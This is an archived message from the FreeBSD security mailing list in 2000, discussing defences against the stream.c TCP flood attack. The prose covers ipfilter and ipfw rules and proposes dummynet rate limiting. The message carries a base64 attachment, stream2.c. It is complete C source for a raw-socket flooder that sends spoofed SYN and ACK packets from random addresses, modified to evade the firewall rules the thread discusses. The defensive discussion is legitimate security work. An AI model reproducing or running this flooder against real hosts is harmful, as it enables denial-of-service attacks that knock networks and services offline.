Date: Thu, 22 Jun 2000 13:24:21 +0400 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> To: "Maksimov Maksim" <maksim@tts.tomsk.su>, <freebsd-security@FreeBSD.ORG> Subject: Re: How defend from stream2.c attack? (Fwd: Re[2]: explanation and code for stream.c issues) Message-ID: <10558.000622@sandy.ru>
next in thread | raw e-mail | index | archive | help
------------4B7E20EB2F02F8 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To remind what is stream2.c I wonder it still working after disabling RST, but may be it's because of combining SYN packets with invalid ACK packets. May be it's just another kind of attack and it's not connected with flood. My recommendation on blocking this attack is to limit a number of packets in a unit of time, as shown below. But it still not tested :( http://www.security.nnov.ru /\_/\ { . . } |\ +--oQQo->{ ^ }<-----+ \ | 3APA3A U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles) This is a forwarded message From: Vladimir Dubrovin <vlad@sandy.ru> To: Tim Yardley <yardley@uiuc.edu> Subject: explanation and code for stream.c issues ===8<==============Original message text=============== 21.01.00 22:15, you wrote: explanation and code for stream.c issues; >>T> -- start rule set -- >>T> block in quick proto tcp from any to any head 100 >>T> pass in quick proto tcp from any to any flags S keep state group 100 >>T> pass in all >>T> -- end rule set -- >> >>Attack can be easily changed to send pair SYN and invalid SYN/ACK My mistake here - SYN/ACK packet isn't required. Sorry, i wrote this message after 11 hours of work. Intruder sends SYN packet and then sends, lets say 1000 ACK packets to the same port from same port and source address. SYN packet will open ipfilter to pass all others packets. This attack doesn't need randomization for each packet. By the way - published stream.c doesn't use ACK bit at all. packet.tcp.th_flags = 0; It looks like usual flooder and can be easily filtered with ipfw by blocking packets without any flags set (this packets are invalid for TCP). allow tcp from any to any tcpflags ack allow tcp from any to any tcpflags syn allow tcp from any to any tcpflags syn,ack allow tcp from any to any tcpflags rst ... deny tcp from any to any Attached is patched stream.c which sends (SYN packet + 1023 ACK packets) from random port and source. This ipfw rule and published ipfilter rule will be unusable against this attack. In my current location i can't test it. T> As was mentioned in the "advisory/explanation" on the issue, ipfw cannot T> deal with the problem due to the fact that it is stateless. T> The attack comes from random ip addresses, therefore throttling like that T> only hurts your connection or solves nothing at all. In other words, the T> random sourcing and method of the attack, makes a non-stateless firewall T> useless. It would be better if you reed the rule before answering. Of cause, ipfw can't find invalid ACK packets. But if OS supports DUMMYNET option ipfw can be used to limit the number of packets in a fixed amount of time. In this case: ipfw pipe 10 config delay 50 queue 500 packets ipfw add pipe 10 tcp from any to $MYHOST in via $EXTERNAL we limit router to allow only 500 TCP packets in every 50ms. Average size of tcp packet is approx. 500 bytes (you can test it). So, you allow bandwidth of 40M pbs for standard TCP traffic. But this rule will effectively block any spoofing attack which uses small packets. If 50-bytes packets are used this rule will allow only bandwith 4M bps for such attack. Not only "ACK" attack, but any flood. We didn't check source, so we're safe againt any spoofing. Of cause in this case you will loose TCP packets during an attack and connections can be dropped, but at least your host will be safe. As it was pointed, _any_ packet filter, including ipfilter, can't solve this problem completely. +=-=-=-=-=-=-=-=-=+ |Vladimir Dubrovin| | Sandy Info, ISP | +=-=-=-=-=-=-=-=-=+ ===8<===========End of original message text=========== ------------4B7E20EB2F02F8 Content-Type: application/octet-stream; name="stream2.c" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="stream2.c" I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8dW5pc3Rk Lmg+DQojaW5jbHVkZSA8c3RyaW5ncy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVk ZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2lmbmRlZiBfX1VTRV9C U0QNCiNkZWZpbmUgX19VU0VfQlNEDQojZW5kaWYNCiNpZm5kZWYgX19GQVZPUl9CU0QNCiNkZWZp bmUgX19GQVZPUl9CU0QNCiNlbmRpZg0KI2luY2x1ZGUgPG5ldGluZXQvaW5fc3lzdG0uaD4NCiNp bmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pcC5oPg0KI2luY2x1ZGUg PG5ldGluZXQvdGNwLmg+DQojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8bmV0ZGIu aD4NCg0KI2lmZGVmIExJTlVYDQojZGVmaW5lIEZJWCh4KSAgaHRvbnMoeCkNCiNlbHNlDQojZGVm aW5lIEZJWCh4KSAgKHgpDQojZW5kaWYNCg0Kc3RydWN0IGlwX2hkciB7DQogICAgdV9pbnQgICAg ICAgaXBfaGw6NCwgICAgICAgICAgICAgICAgLyogaGVhZGVyIGxlbmd0aCBpbiAzMiBiaXQgd29y ZHMgKi8NCiAgICAgICAgICAgICAgICBpcF92OjQ7ICAgICAgICAgICAgICAgICAvKiBpcCB2ZXJz aW9uICovDQogICAgdV9jaGFyICAgICAgaXBfdG9zOyAgICAgICAgICAgICAgICAgLyogdHlwZSBv ZiBzZXJ2aWNlICovDQogICAgdV9zaG9ydCAgICAgaXBfbGVuOyAgICAgICAgICAgICAgICAgLyog dG90YWwgcGFja2V0IGxlbmd0aCAqLw0KICAgIHVfc2hvcnQgICAgIGlwX2lkOyAgICAgICAgICAg ICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICovDQogICAgdV9zaG9ydCAgICAgaXBfb2ZmOyAgICAg ICAgICAgICAgICAgLyogZnJhZ21lbnQgb2Zmc2V0ICovDQogICAgdV9jaGFyICAgICAgaXBfdHRs OyAgICAgICAgICAgICAgICAgLyogdGltZSB0byBsaXZlICovDQogICAgdV9jaGFyICAgICAgaXBf cDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9jb2wgKi8NCiAgICB1X3Nob3J0ICAgICBpcF9z dW07ICAgICAgICAgICAgICAgICAvKiBpcCBjaGVja3N1bSAqLw0KICAgIHVfbG9uZyAgICAgIHNh ZGRyLCBkYWRkcjsgICAgICAgICAgIC8qIHNvdXJjZSBhbmQgZGVzdCBhZGRyZXNzICovDQp9Ow0K DQpzdHJ1Y3QgdGNwX2hkciB7DQogICAgdV9zaG9ydCAgICAgdGhfc3BvcnQ7ICAgICAgICAgICAg ICAgLyogc291cmNlIHBvcnQgKi8NCiAgICB1X3Nob3J0ICAgICB0aF9kcG9ydDsgICAgICAgICAg ICAgICAvKiBkZXN0aW5hdGlvbiBwb3J0ICovDQogICAgdV9sb25nICAgICAgdGhfc2VxOyAgICAg ICAgICAgICAgICAgLyogc2VxdWVuY2UgbnVtYmVyICovDQogICAgdV9sb25nICAgICAgdGhfYWNr OyAgICAgICAgICAgICAgICAgLyogYWNrbm93bGVkZ2VtZW50IG51bWJlciAqLw0KICAgIHVfaW50 ICAgICAgIHRoX3gyOjQsICAgICAgICAgICAgICAgIC8qIHVudXNlZCAqLw0KICAgICAgICAgICAg ICAgIHRoX29mZjo0OyAgICAgICAgICAgICAgIC8qIGRhdGEgb2Zmc2V0ICovDQogICAgdV9jaGFy ICAgICAgdGhfZmxhZ3M7ICAgICAgICAgICAgICAgLyogZmxhZ3MgZmllbGQgKi8NCiAgICB1X3No b3J0ICAgICB0aF93aW47ICAgICAgICAgICAgICAgICAvKiB3aW5kb3cgc2l6ZSAqLw0KICAgIHVf c2hvcnQgICAgIHRoX3N1bTsgICAgICAgICAgICAgICAgIC8qIHRjcCBjaGVja3N1bSAqLw0KICAg IHVfc2hvcnQgICAgIHRoX3VycDsgICAgICAgICAgICAgICAgIC8qIHVyZ2VudCBwb2ludGVyICov DQp9Ow0KDQpzdHJ1Y3QgdGNwb3B0X2hkciB7DQogICAgdV9jaGFyICB0eXBlOyAgICAgICAgICAg ICAgICAgICAgICAgLyogdHlwZSAqLw0KICAgIHVfY2hhciAgbGVuOyAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgLyogbGVuZ3RoICovDQogICAgdV9zaG9ydCB2YWx1ZTsgICAgICAgICAg ICAgICAgICAgICAgLyogdmFsdWUgKi8NCn07DQoNCnN0cnVjdCBwc2V1ZG9faGRyIHsgICAgICAg ICAgICAgICAgICAgICAvKiBTZWUgUkZDIDc5MyBQc2V1ZG8gSGVhZGVyICovDQogICAgdV9sb25n IHNhZGRyLCBkYWRkcjsgICAgICAgICAgICAgICAgICAgICAgICAvKiBzb3VyY2UgYW5kIGRlc3Qg YWRkcmVzcyAqLw0KICAgIHVfY2hhciBtYnosIHB0Y2w7ICAgICAgICAgICAgICAgICAgIC8qIHpl cm8gYW5kIHByb3RvY29sICovDQogICAgdV9zaG9ydCB0Y3BsOyAgICAgICAgICAgICAgICAgICAg ICAgLyogdGNwIGxlbmd0aCAqLw0KfTsNCg0Kc3RydWN0IHBhY2tldCB7DQogICAgc3RydWN0IGlw LypfaGRyKi8gaXA7DQogICAgc3RydWN0IHRjcGhkciB0Y3A7DQovKiBzdHJ1Y3QgdGNwb3B0X2hk ciBvcHQ7ICovDQp9Ow0KDQpzdHJ1Y3QgY2tzdW0gew0KICAgIHN0cnVjdCBwc2V1ZG9faGRyIHBz ZXVkbzsNCiAgICBzdHJ1Y3QgdGNwaGRyIHRjcDsNCn07DQoNCnN0cnVjdCBwYWNrZXQgcGFja2V0 Ow0Kc3RydWN0IGNrc3VtIGNrc3VtOw0Kc3RydWN0IHNvY2thZGRyX2luIHNfaW47DQp1X3Nob3J0 IGRzdHBvcnQsIHBrdHNpemUsIHBwczsNCnVfbG9uZyBkc3RhZGRyOw0KaW50IHNvY2s7DQoNCnZv aWQgdXNhZ2UoY2hhciAqcHJvZ25hbWUpDQp7DQogICAgZnByaW50ZihzdGRlcnIsICJVc2FnZTog JXMgPGRzdGFkZHI+IDxkc3Rwb3J0PiA8cGt0c2l6ZT4gPHBwcz5cbiIsIA0KcHJvZ25hbWUpOw0K ICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdGFkZHIgIC0gdGhlIHRhcmdldCB3ZSBhcmUgdHJ5 aW5nIHRvIGF0dGFjay5cbiIpOw0KICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdHBvcnQgIC0g dGhlIHBvcnQgb2YgdGhlIHRhcmdldCwgMCA9IHJhbmRvbS5cbiIpOw0KICAgIGZwcmludGYoc3Rk ZXJyLCAiICAgIHBrdHNpemUgIC0gdGhlIGV4dHJhIHNpemUgdG8gdXNlLiAgMCA9IG5vcm1hbCAN CnN5bi5cbiIpOw0KICAgIGV4aXQoMSk7DQp9DQoNCi8qIFRoaXMgaXMgYSByZWZlcmVuY2UgaW50 ZXJuZXQgY2hlY2tzdW0gaW1wbGltZW50YXRpb24sIG5vdCB2ZXJ5IGZhc3QgKi8NCmlubGluZSB1 X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pDQp7DQogICAgcmVnaXN0ZXIg aW50IG5sZWZ0ID0gbGVuOw0KICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRyOw0KICAgIHJl Z2lzdGVyIGludCBzdW0gPSAwOw0KICAgIHVfc2hvcnQgYW5zd2VyID0gMDsNCg0KICAgICAvKiBP dXIgYWxnb3JpdGhtIGlzIHNpbXBsZSwgdXNpbmcgYSAzMiBiaXQgYWNjdW11bGF0b3IgKHN1bSks IHdlIGFkZA0KICAgICAgKiBzZXF1ZW50aWFsIDE2IGJpdCB3b3JkcyB0byBpdCwgYW5kIGF0IHRo ZSBlbmQsIGZvbGQgYmFjayBhbGwgdGhlDQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUgdG9w IDE2IGJpdHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8NCg0KICAgICB3aGlsZSAobmxlZnQg PiAxKSAgew0KICAgICAgICAgc3VtICs9ICp3Kys7DQogICAgICAgICBubGVmdCAtPSAyOw0KICAg ICB9DQoNCiAgICAgLyogbW9wIHVwIGFuIG9kZCBieXRlLCBpZiBuZWNlc3NhcnkgKi8NCiAgICAg aWYgKG5sZWZ0ID09IDEpIHsNCiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2No YXIgKikgdzsNCiAgICAgICAgIHN1bSArPSBhbnN3ZXI7DQogICAgIH0NCg0KICAgICAvKiBhZGQg YmFjayBjYXJyeSBvdXRzIGZyb20gdG9wIDE2IGJpdHMgdG8gbG93IDE2IGJpdHMgKi8NCiAgICAg c3VtID0gKHN1bSA+PiAxNikgKyAoc3VtICYgMHhmZmZmKTsgLyogYWRkIGhpIDE2IHRvIGxvdyAx NiAqLw0KICAgICBzdW0gKz0gKHN1bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJy eSAqLw0KICAgICBhbnN3ZXIgPSB+c3VtOyAgICAgICAgICAgICAgICAgICAgIC8qIHRydW5jYXRl IHRvIDE2IGJpdHMgKi8NCiAgICAgcmV0dXJuKGFuc3dlcik7DQp9DQoNCnVfbG9uZyBsb29rdXAo Y2hhciAqaG9zdG5hbWUpDQp7DQogICAgc3RydWN0IGhvc3RlbnQgKmhwOw0KDQogICAgaWYgKCho cCA9IGdldGhvc3RieW5hbWUoaG9zdG5hbWUpKSA9PSBOVUxMKSB7DQogICAgICAgZnByaW50Zihz dGRlcnIsICJDb3VsZCBub3QgcmVzb2x2ZSAlcy5cbiIsIGhvc3RuYW1lKTsNCiAgICAgICBleGl0 KDEpOw0KICAgIH0NCg0KICAgIHJldHVybiAqKHVfbG9uZyAqKWhwLT5oX2FkZHI7DQp9DQoNCg0K dm9pZCBmbG9vZGVyKHZvaWQpDQp7DQogICAgc3RydWN0IHRpbWVzcGVjIHRzOw0KICAgIGludCBp Ow0KDQoNCiAgICBtZW1zZXQoJnBhY2tldCwgMCwgc2l6ZW9mKHBhY2tldCkpOw0KDQogICAgdHMu dHZfc2VjICAgICAgICAgICAgICAgICAgID0gMDsNCiAgICB0cy50dl9uc2VjICAgICAgICAgICAg ICAgICAgPSAxMDsNCg0KICAgIHBhY2tldC5pcC5pcF9obCAgICAgICAgICAgICA9IDU7DQogICAg cGFja2V0LmlwLmlwX3YgICAgICAgICAgICAgID0gNDsNCiAgICBwYWNrZXQuaXAuaXBfcCAgICAg ICAgICAgICAgPSBJUFBST1RPX1RDUDsNCiAgICBwYWNrZXQuaXAuaXBfdG9zICAgICAgICAgICAg PSAweDA4Ow0KICAgIHBhY2tldC5pcC5pcF9pZCAgICAgICAgICAgICA9IHJhbmQoKTsNCiAgICBw YWNrZXQuaXAuaXBfbGVuICAgICAgICAgICAgPSBGSVgoc2l6ZW9mKHBhY2tldCkpOw0KICAgIHBh Y2tldC5pcC5pcF9vZmYgICAgICAgICAgICA9IDA7IC8qIElQX0RGPyAqLw0KICAgIHBhY2tldC5p cC5pcF90dGwgICAgICAgICAgICA9IDI1NTsNCiAgICBwYWNrZXQuaXAuaXBfZHN0LnNfYWRkciAg ICAgPSByYW5kb20oKTsNCg0KICAgIHBhY2tldC50Y3AudGhfZmxhZ3MgICAgICAgICA9IDA7DQog ICAgcGFja2V0LnRjcC50aF93aW4gICAgICAgICAgID0gaHRvbnMoMTYzODQpOw0KICAgIHBhY2tl dC50Y3AudGhfc2VxICAgICAgICAgICA9IHJhbmRvbSgpOw0KICAgIHBhY2tldC50Y3AudGhfYWNr ICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRjcC50aF9vZmYgICAgICAgICAgID0gNTsgLyog NSAqLw0KICAgIHBhY2tldC50Y3AudGhfdXJwICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRj cC50aF9kcG9ydCAgICAgICAgID0gZHN0cG9ydD9odG9ucyhkc3Rwb3J0KTpyYW5kKCk7DQoNCi8q DQogICAgcGFja2V0Lm9wdC50eXBlICAgICAgICAgICAgID0gMHgwMjsNCiAgICBwYWNrZXQub3B0 LmxlbiAgICAgICAgICAgICAgPSAweDA0Ow0KICAgIHBhY2tldC5vcHQudmFsdWUgICAgICAgICAg ICA9IGh0b25zKDE0NjApOw0KKi8NCg0KDQogICAgY2tzdW0ucHNldWRvLmRhZGRyICAgICAgICAg ID0gZHN0YWRkcjsNCiAgICBja3N1bS5wc2V1ZG8ubWJ6ICAgICAgICAgICAgPSAwOw0KICAgIGNr c3VtLnBzZXVkby5wdGNsICAgICAgICAgICA9IElQUFJPVE9fVENQOw0KICAgIGNrc3VtLnBzZXVk by50Y3BsICAgICAgICAgICA9IGh0b25zKHNpemVvZihzdHJ1Y3QgdGNwaGRyKSk7DQoNCiAgICBz X2luLnNpbl9mYW1pbHkgICAgICAgICAgICAgPSBBRl9JTkVUOw0KICAgIHNfaW4uc2luX2FkZHIu c19hZGRyICAgICAgICAgICAgICAgID0gZHN0YWRkcjsNCiAgICBzX2luLnNpbl9wb3J0ICAgICAg ICAgICAgICAgPSBwYWNrZXQudGNwLnRoX2Rwb3J0Ow0KDQogICAgZm9yKGk9MDs7KytpKSB7DQov KiANCglwYXRjaGVkIGJ5IDNBUEEzQSB0byBzZW5kIDEgc3luIHBhY2tldCArIDEwMjMgQUNLIHBh Y2tldHMuIA0KDQoqLw0KICAgIGlmKCAhKGkmMHgzRkYpICkgew0KCXBhY2tldC50Y3AudGhfc3Bv cnQgPSByYW5kKCk7DQoJY2tzdW0ucHNldWRvLnNhZGRyID0gcGFja2V0LmlwLmlwX3NyYy5zX2Fk ZHIgPSByYW5kb20oKTsNCglwYWNrZXQudGNwLnRoX2ZsYWdzID0gVEhfU1lOOw0KICAgICAgICBw YWNrZXQudGNwLnRoX2FjayAgICAgICAgICAgPSAwOw0KDQogICAgfQ0KICAgIGVsc2Ugew0KCXBh Y2tldC50Y3AudGhfZmxhZ3MgPSBUSF9BQ0s7DQoJcGFja2V0LnRjcC50aF9hY2sgPSByYW5kKCk7 DQogICAgfQ0KDQoNCiAgICAvKiBja3N1bS5wc2V1ZG8uc2FkZHIgPSBwYWNrZXQuaXAuaXBfc3Jj LnNfYWRkciA9IHJhbmRvbSgpOyAqLw0KICAgICAgICsrcGFja2V0LmlwLmlwX2lkOw0KICAgICAg IC8qKytwYWNrZXQudGNwLnRoX3Nwb3J0Ki87DQogICAgICAgKytwYWNrZXQudGNwLnRoX3NlcTsN Cg0KICAgICAgIGlmICghZHN0cG9ydCkNCiAgICAgICAgICBzX2luLnNpbl9wb3J0ID0gcGFja2V0 LnRjcC50aF9kcG9ydCA9IHJhbmQoKTsNCg0KICAgICAgIHBhY2tldC5pcC5pcF9zdW0gICAgICAg ICA9IDA7DQogICAgICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgICAgICAgPSAwOw0KDQog ICAgICAgY2tzdW0udGNwICAgICAgICAgICAgICAgICAgICAgICAgPSBwYWNrZXQudGNwOw0KDQog ICAgICAgcGFja2V0LmlwLmlwX3N1bSAgICAgICAgID0gaW5fY2tzdW0oKHZvaWQgKikmcGFja2V0 LmlwLCAyMCk7DQogICAgICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgICAgICAgPSBpbl9j a3N1bSgodm9pZCAqKSZja3N1bSwgc2l6ZW9mKGNrc3VtKSk7DQoNCiAgICAgICBpZiAoc2VuZHRv KHNvY2ssICZwYWNrZXQsIHNpemVvZihwYWNrZXQpLCAwLCAoc3RydWN0IHNvY2thZGRyIA0KKikm c19pbiwgc2l6ZW9mKHNfaW4pKSA8IDApDQogICAgICAgICAgcGVycm9yKCJqZXNzIik7DQoNCiAg ICB9DQp9DQoNCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogICAgaW50IG9u ID0gMTsNCg0KICAgIHByaW50Zigic3RyZWFtLmMgdjEuMDEgLSBUQ1AgUGFja2V0IFN0b3JtXG4i KTsNCg0KICAgIGlmICgoc29jayA9IHNvY2tldChQRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19S QVcpKSA8IDApIHsNCiAgICAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgICAgIGV4aXQoMSk7DQog ICAgfQ0KDQogICAgc2V0Z2lkKGdldGdpZCgpKTsgc2V0dWlkKGdldHVpZCgpKTsNCg0KICAgIGlm IChhcmdjIDwgNCkNCiAgICAgICB1c2FnZShhcmd2WzBdKTsNCg0KICAgIGlmIChzZXRzb2Nrb3B0 KHNvY2ssIElQUFJPVE9fSVAsIElQX0hEUklOQ0wsIChjaGFyICopJm9uLCBzaXplb2Yob24pKSA8 IA0KMCkgew0KICAgICAgIHBlcnJvcigic2V0c29ja29wdCIpOw0KICAgICAgIGV4aXQoMSk7DQog ICAgfQ0KDQogICAgc3JhbmQoKHRpbWUoTlVMTCkgXiBnZXRwaWQoKSkgKyBnZXRwcGlkKCkpOw0K DQogICAgcHJpbnRmKCJcblJlc29sdmluZyBJUHMuLi4iKTsgZmZsdXNoKHN0ZG91dCk7DQoNCiAg ICBkc3RhZGRyICAgICA9IGxvb2t1cChhcmd2WzFdKTsNCiAgICBkc3Rwb3J0ICAgICA9IGF0b2ko YXJndlsyXSk7DQogICAgcGt0c2l6ZSAgICAgPSBhdG9pKGFyZ3ZbM10pOw0KDQogICAgcHJpbnRm KCJTZW5kaW5nLi4uIik7IGZmbHVzaChzdGRvdXQpOw0KDQogICAgZmxvb2RlcigpOw0KDQogICAg cmV0dXJuIDA7DQp9DQo= ------------4B7E20EB2F02F8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?10558.000622>